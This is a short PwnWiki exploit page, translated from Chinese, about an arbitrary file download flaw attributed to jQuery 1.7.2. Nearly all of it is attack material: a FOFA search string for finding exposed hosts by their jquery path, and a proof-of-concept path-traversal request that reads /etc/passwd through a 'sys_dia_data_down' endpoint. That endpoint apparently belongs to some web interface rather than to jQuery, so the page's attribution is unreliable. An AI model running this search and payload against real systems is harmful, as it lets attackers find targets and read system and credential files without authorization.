JQuery 1.7.2 arbitrary file download vulnerability

From PwnWiki
This page is a translated version of the page JQuery 1.7.2 任意文件下載漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English

Vulnerability Impact

JQuery 1.7.2

FOFA

body="webui/js/jquerylib/jquery-1.7.2.min.js"

POC

/webui/?g=sys_dia_data_down&file_name=../etc/passwd
Retrieved from "https://pwnwiki.com/index.php?title=JQuery_1.7.2_任意文件下載漏洞/en&oldid=5855"